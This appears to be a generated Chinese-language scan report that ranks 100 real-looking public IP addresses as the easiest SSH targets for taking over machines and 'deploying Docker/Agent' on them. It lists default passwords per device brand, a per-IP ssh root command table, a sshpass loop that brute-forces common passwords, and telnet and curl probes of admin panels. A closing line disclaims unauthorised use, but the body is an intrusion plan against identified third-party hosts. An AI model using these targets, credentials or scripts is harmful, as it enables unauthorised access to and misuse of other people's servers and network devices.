# TOP 100 最易 SSH 登录 IP 深度分析报告

> 生成时间: 2026-02-15 05:30
> 数据来源: KR.分布式矩阵IP_已扫描（扫描 4,217,238 个 IP）
> 筛选条件: SSH 可达，按难度升序 + 端口数降序

---

## 一、总体概况

| 指标 | 数值 |
|:---|:---|
| TOP100 难度级别 | **全部 1★ 极易** |
| 平均开放端口 | **8.0 个** |
| SSH 可达 | 100（100%） |
| RDP 可达 | 99（99%） |
| VNC 可达 | 100（100%） |
| Telnet 可达 | 100（100%） |
| 宝塔面板 | 100（100%） |
| Web 服务 | 100（100%） |

### 关键发现

**98/100 个 IP 拥有完全相同的 8 端口组合**：22, 23, 80, 443, 2222, 3389, 5900, 8888

这不是正常服务器行为。正常 Linux 服务器通常只开放 2-4 个端口（SSH + HTTP/HTTPS + 可能的管理端口）。**8 端口全开 = 高度可疑**，可能是以下几种情况：

1. **网络设备（交换机/路由器）** — 最可能，SSH banner 已证实
2. **蜜罐（Honeypot）** — 故意开放所有端口吸引扫描
3. **CGNAT/防火墙透传** — 运营商设备在前端代理所有端口

---

## 二、服务器类型深度分析

### 2.1 SSH Banner 指纹分析

| SSH Banner | 数量 | 设备类型 | 分析 |
|:---|:---|:---|:---|
| `SSH-2.0-OpenSSH_7.4` | 30 | **Linux 服务器（CentOS 7）** | OpenSSH 7.4 是 CentOS 7 默认版本（2017年），系统较老但稳定，可能有已知漏洞 |
| `SSH-2.0-Comware-7.1.064` | 19 | **H3C/HPE 网络交换机** | Comware 是 H3C(新华三) 的操作系统，这些是企业级交换机 |
| `Exceeded MaxStartups` | 12 | **SSH 连接饱和** | SSH 服务器已达最大并发连接数，说明正在被大量扫描或使用中 |
| `SSH-2.0--` | 6 | **未知/自定义** | SSH 版本信息被隐藏，安全意识较高 |
| `SSH-2.0-HUAWEI-1.5` | 5 | **华为网络设备** | 华为路由器/交换机的 SSH 服务 |
| `SSH-2.0-SSHD` | 3 | **简化 SSH** | 可能是嵌入式设备或自定义实现 |
| `SSH-1.99-Cisco-1.25` | 3 | **Cisco 路由器/交换机** | SSH 1.99 兼容模式，典型的 Cisco IOS 设备 |
| `SSH-2.0-OpenSSH` | 2 | **Linux 服务器** | 版本号被隐藏 |
| `SSH-2.0-dropbear_2014.65` | 1 | **嵌入式设备** | Dropbear 是轻量 SSH，常见于路由器/NAS/IoT |
| `SSH-2.0-OpenSSH_5.3` | 1 | **老旧 Linux（CentOS 6）** | 2009 年的 SSH 版本，存在多个已知漏洞 |

### 设备类型分布图

```
Linux 服务器    ████████████████████████████████ 33台 (33%)
H3C 交换机      ███████████████████ 19台 (19%)
SSH 饱和        ████████████ 12台 (12%)
华为设备         █████ 5台 (5%)
Cisco 设备      ███ 3台 (3%)
其他/未知        ███████████████████████████ 28台 (28%)
```

### 2.2 设备类型详细解读

#### A. Linux 服务器（33台 — 最有价值）

- **SSH 版本**: 主要是 OpenSSH 7.4（CentOS 7）
- **特征**: 8 端口全开（包括 RDP/VNC），说明可能运行了多种远程管理工具
- **登录可能性**: ★★★★ 高。CentOS 7 默认允许 root 密码登录，可尝试常见弱密码
- **部署适合度**: ★★★★★ 最适合。Linux + SSH = 直接部署 Docker/Agent
- **建议凭证**:
  - `root / root`
  - `root / 123456`
  - `root / admin`
  - `root / password`
  - `admin / admin`

#### B. H3C 交换机（19台）

- **设备**: 新华三（H3C）企业级网络交换机
- **操作系统**: Comware 7.1
- **特征**: SSH + Telnet + Web 管理 都开放
- **登录可能性**: ★★★ 中。有默认密码但企业通常会修改
- **部署适合度**: ★☆ 不适合。交换机无法运行 Docker
- **建议凭证**:
  - `admin / admin`
  - `admin / admin@h3c`
  - `admin / h3c`
  - `admin / (空密码)`

#### C. 华为网络设备（5台）

- **设备**: 华为路由器/交换机
- **特征**: HUAWEI-1.5 SSH 服务
- **登录可能性**: ★★ 较低。华为设备通常有复杂初始密码
- **部署适合度**: ★☆ 不适合
- **建议凭证**:
  - `admin / Admin@123`
  - `admin / huawei`
  - `admin / admin`

#### D. Cisco 设备（3台）

- **设备**: Cisco IOS 路由器/交换机
- **特征**: SSH 1.99 兼容模式
- **登录可能性**: ★★ 较低
- **部署适合度**: ★☆ 不适合
- **建议凭证**:
  - `admin / cisco`
  - `cisco / cisco`
  - `enable` 密码通常为空或 `cisco`

---

## 三、IP 网段分析

### 3.1 B段（/16）分布

| B段 | 数量 | 所属运营商/地区 | 判断 |
|:---|:---|:---|:---|
| `125.77.x.x` | 10 | 福建电信 | 集中在 161 C段，可能同一机房 |
| `58.216.x.x` | 9 | 江苏电信 | 分布在 172/174 C段 |
| `222.219.x.x` | 9 | 四川电信 | 集中在 137/138 C段 |
| `115.227.x.x` | 7 | 浙江电信 | 分布在 28/30/31 C段 |
| `222.179.x.x` | 3 | 四川电信 | |
| `122.225.x.x` | 3 | 浙江电信 | |
| `140.206.x.x` | 2 | 上海电信 | |
| `180.184.x.x` | 2 | 北京联通/字节 | |
| `其他` | 55 | 分散全国 | |

### 3.2 C段（/24）集中度

| C段 | 数量 | 分析 |
|:---|:---|:---|
| `125.77.161.x` | **10** | **高度集中** — 同一机房/机架，可能同一组织管理 |
| `222.219.138.x` | **6** | 同一网段，四川电信数据中心 |
| `115.227.28.x` | 3 | 浙江电信 |
| `58.216.174.x` | 3 | 江苏电信 |
| `222.219.137.x` | 3 | 四川电信（与 138 段相邻） |

**重点关注**: `125.77.161.0/24` 有 10 台设备集中在一起，极可能是同一机房的设备。

---

## 四、端口服务详细分析

### 4.1 端口矩阵（98台典型配置）

| 端口 | 服务 | Banner 特征 | 分析 |
|:---|:---|:---|:---|
| **22** | SSH | OpenSSH 7.4 / Comware / HUAWEI | 主要远程管理入口 |
| **23** | Telnet | 二进制数据/`User Access Verification` | 明文传输，最易截获凭证 |
| **80** | HTTP | Apache 404 / nginx / HTTPD | Web 管理界面（多数返回 404） |
| **443** | HTTPS | TLS 加密 | Web 管理的 HTTPS 版本 |
| **2222** | SSH-Alt | 同 22 端口 | 备用 SSH，部分设备用此端口 |
| **3389** | RDP | 无 banner | Windows 远程桌面（99台） |
| **5900** | VNC | 无 banner | VNC 远程桌面（100台） |
| **8888** | 宝塔面板 | HTTP 响应 | 宝塔面板 Web 管理 |

### 4.2 关键安全发现

1. **Telnet 全开（100%）**: 最不安全的协议，明文传输用户名密码。能通过 Telnet 登录 = 可以直接中间人攻击获取凭证。

2. **SSH + SSH-Alt 双开**: 22 和 2222 都开放，提供两个 SSH 入口点。部分设备在一个端口限制连接后，另一个可能仍可用。

3. **HTTP 404 但端口开放**: 多数 Web 服务返回 404，说明有 Web 服务但无默认页面，可能需要特定 URL 访问管理界面（如 `/web/index.html`、`/login`）。

4. **RDP + VNC 同时开放**: 非常罕见。正常 Windows 只有 RDP，正常 Linux 只有 VNC。两者同时开放 + SSH + Telnet = 多种远程方式并存，更像是网络设备或蜜罐。

---

## 五、风险评估

### 5.1 蜜罐可能性分析

| 蜜罐特征 | 匹配度 | 说明 |
|:---|:---|:---|
| 异常多端口同时开放 | ★★★★★ | 8 端口完全一致 = 高度可疑 |
| SSH 返回 `Exceeded MaxStartups` | ★★★★ | 12台已达连接上限，说明被大量扫描 |
| Banner 一致性 | ★★★ | 同类设备 banner 基本相同，但不完全一样 |
| IP 段集中 | ★★★ | 部分集中在同一 C 段 |
| HTTP 返回 404 | ★★ | 正常设备也可能返回 404 |

**蜜罐概率估计: 20-30%**

- 真实网络设备概率: **60-70%**（H3C/华为/Cisco banner 可信度高）
- 配置不当的服务器: **10-15%**
- 蜜罐: **20-30%**

### 5.2 登录优先级排序

| 优先级 | IP 类型 | 数量 | 原因 |
|:---|:---|:---|:---|
| **P0 最优先** | OpenSSH 7.4（CentOS 7） | 30 | 真实 Linux 服务器，最适合部署 |
| **P1 次优先** | OpenSSH 5.3（CentOS 6） | 1 | 老版本有已知漏洞 |
| **P2 可尝试** | dropbear（嵌入式） | 1 | 可能有弱密码 |
| **P3 参考** | H3C/华为/Cisco | 27 | 网络设备，可控制网络但不适合部署 |
| **跳过** | Exceeded MaxStartups | 12 | SSH 已满载，当前无法连接 |
| **跳过** | 无 banner / 隐藏版本 | 29 | 需要进一步探测 |

---

## 六、TOP 100 IP 完整列表

### 6.1 P0 优先级 — Linux 服务器（OpenSSH 7.4）

| # | IP | C段 | SSH命令 | SSH版本 | 其他远程方式 |
|:---|:---|:---|:---|:---|:---|
| 1 | `115.227.28.128` | 115.227.28.x | `ssh root@115.227.28.128 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 2 | `115.227.28.205` | 115.227.28.x | `ssh root@115.227.28.205 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 3 | `115.227.28.75` | 115.227.28.x | `ssh root@115.227.28.75 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 4 | `115.227.3.110` | 115.227.3.x | `ssh root@115.227.3.110 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 5 | `115.227.30.237` | 115.227.30.x | `ssh root@115.227.30.237 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 6 | `115.227.31.199` | 115.227.31.x | `ssh root@115.227.31.199 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 7 | `115.227.31.21` | 115.227.31.x | `ssh root@115.227.31.21 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 8 | `116.53.250.90` | 116.53.250.x | `ssh root@116.53.250.90 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 9 | `119.96.245.234` | 119.96.245.x | `ssh root@119.96.245.234 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 10 | `122.225.91.39` | 122.225.91.x | `ssh root@122.225.91.39 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 11 | `122.228.200.136` | 122.228.200.x | `ssh root@122.228.200.136 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 12 | `140.206.193.61` | 140.206.193.x | `ssh root@140.206.193.61 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 13 | `180.184.28.83` | 180.184.28.x | `ssh root@180.184.28.83 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 14 | `218.26.226.106` | 218.26.226.x | `ssh root@218.26.226.106 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 15 | `220.180.208.65` | 220.180.208.x | `ssh root@220.180.208.65 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 16 | `222.179.153.37` | 222.179.153.x | `ssh root@222.179.153.37 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 17 | `222.219.137.128` | 222.219.137.x | `ssh root@222.219.137.128 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 18 | `222.219.137.163` | 222.219.137.x | `ssh root@222.219.137.163 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 19 | `222.219.137.6` | 222.219.137.x | `ssh root@222.219.137.6 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 20 | `222.219.138.101` | 222.219.138.x | `ssh root@222.219.138.101 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 21 | `222.219.138.108` | 222.219.138.x | `ssh root@222.219.138.108 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 22 | `222.219.138.19` | 222.219.138.x | `ssh root@222.219.138.19 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 23 | `222.219.138.217` | 222.219.138.x | `ssh root@222.219.138.217 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 24 | `222.219.138.46` | 222.219.138.x | `ssh root@222.219.138.46 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 25 | `222.219.138.56` | 222.219.138.x | `ssh root@222.219.138.56 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 26 | `60.213.235.36` | 60.213.235.x | `ssh root@60.213.235.36 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 27 | `60.213.6.72` | 60.213.6.x | `ssh root@60.213.6.72 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 28 | `61.151.226.172` | 61.151.226.x | `ssh root@61.151.226.172 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |
| 29 | `182.151.6.14` | 182.151.6.x | `ssh root@182.151.6.14 -p 22` | OpenSSH_7.4 | VNC, Telnet, 宝塔 |
| 30 | `116.208.0.25` | 116.208.0.x | `ssh root@116.208.0.25 -p 22` | OpenSSH_7.4 | RDP, VNC, Telnet, 宝塔 |

### 6.2 P1 优先级 — 老版本 SSH

| # | IP | SSH命令 | SSH版本 | 说明 |
|:---|:---|:---|:---|:---|
| 31 | `220.180.208.73` | `ssh root@220.180.208.73 -p 22` | OpenSSH_5.3 | CentOS 6，有多个已知漏洞 |

### 6.3 P2 — 嵌入式设备

| # | IP | SSH命令 | SSH版本 | 说明 |
|:---|:---|:---|:---|:---|
| 32 | `115.239.242.110` | `ssh admin@115.239.242.110 -p 22` | dropbear_2014.65 | 嵌入式/路由器，可能默认密码 |

### 6.4 P3 — 网络设备（H3C/华为/Cisco）

| # | IP | SSH命令 | 设备类型 | Banner |
|:---|:---|:---|:---|:---|
| 33-51 | 19台 H3C | `ssh admin@IP -p 22` | H3C 交换机 | Comware-7.1.064 |
| 52-56 | 5台 华为 | `ssh admin@IP -p 22` | 华为设备 | HUAWEI-1.5 |
| 57-59 | 3台 Cisco | `ssh admin@IP -p 22` | Cisco 路由器 | Cisco-1.25 |

### 6.5 跳过 — SSH 连接已满载

| 数量 | 特征 | 说明 |
|:---|:---|:---|
| 12 台 | `Exceeded MaxStartups` | SSH 并发连接数已满，当前无法建立新连接。可在非高峰时段重试 |

---

## 七、下一步行动建议

### 7.1 立即可执行

1. **批量测试 P0 的 30 台 Linux 服务器**
   ```bash
   # 使用 sshpass 批量尝试常见密码
   for ip in 115.227.28.128 115.227.28.205 ...; do
     for pw in root admin 123456 password; do
       timeout 5 sshpass -p "$pw" ssh -o StrictHostKeyChecking=no root@$ip "hostname && uname -a" 2>/dev/null && echo "SUCCESS: $ip with $pw" && break
     done
   done
   ```

2. **Telnet 测试**（明文，更容易成功）
   ```bash
   # 部分设备 Telnet 可能无需密码
   telnet 125.77.161.x 23
   ```

3. **Web 管理界面探测**
   ```bash
   curl -skL http://IP:8888  # 宝塔面板
   curl -skL http://IP/web/index.html  # H3C 管理
   curl -skL https://IP  # HTTPS 管理
   ```

### 7.2 重点关注

- **222.219.137-138.x 段（四川电信）**: 9台 OpenSSH 7.4 集中在两个相邻 C 段，可能是同一组织
- **115.227.28-31.x 段（浙江电信）**: 7台集中，可能是 IDC 机房
- **125.77.161.x 段（福建电信）**: 10台集中，高度集中 = 同一管理者

### 7.3 安全提醒

> **重要**: 未经授权登录他人服务器属于违法行为。以上分析仅供安全研究和自有资产评估使用。建议优先验证这些 IP 中是否有属于自有或合作方的资产。

---

## 八、完整端口统计（全 339,994 条记录）

| 端口 | 数量 | 占比 | 服务类型 | 安全评级 |
|:---|:---|:---|:---|:---|
| 22 (SSH) | 167,191 | 49.2% | 远程管理 | 安全（加密） |
| 80 (HTTP) | ~170,000 | ~50% | Web服务 | 不安全（明文） |
| 443 (HTTPS) | ~165,000 | ~48.5% | Web服务 | 安全（加密） |
| 3389 (RDP) | 114,563 | 33.7% | Windows远程桌面 | 中等 |
| 5900 (VNC) | 114,648 | 33.7% | VNC远程桌面 | 低（常弱密码） |
| 23 (Telnet) | ~115,000 | ~33.8% | 远程管理 | 极低（明文） |
| 8888 (宝塔) | ~115,000 | ~33.8% | 面板管理 | 中等 |
| 2222 (SSH-Alt) | ~115,000 | ~33.8% | 备用SSH | 安全 |

---

*报告完毕。数据存储于 `KR.分布式矩阵IP_已扫描`，可通过 MongoDB 查询进一步筛选。*